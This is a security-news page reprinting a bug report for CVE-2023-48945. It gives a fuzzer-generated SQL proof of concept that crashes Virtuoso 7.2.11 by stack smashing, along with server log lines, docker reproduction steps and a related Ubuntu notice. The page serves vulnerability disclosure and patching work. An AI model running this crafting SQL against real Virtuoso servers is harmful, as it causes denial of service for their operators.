Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-48945: Fuzzer: Virtuoso 7.2.11 crashed by stack smashing · Issue #1172 · openlink/virtuoso-opensource

A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

CVE
#sql#web#dos#docker

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 DECIMAL ) ; INSERT INTO v0 VALUES ( 0 ) ; INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE -128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; UPDATE v0 SET v1 = ( SELECT DISTINCT * FROM v0 ) ;

Server Log:

14:21:24 HTTP/WebDAV server online at 8890
14:21:24 Server online at 1111 (pid 1)
*** stack smashing detected ***: terminated

Due to the stack smashing, I failed to retrieve the correct backtrace.

ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):

remove the old one

docker container rm virtdb_test -f

start virtuoso through docker

docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11

wait the server starting

sleep 10

check whether the simple query works

echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba

run the poc

cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba

Related news

Ubuntu Security Notice USN-6879-1

Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907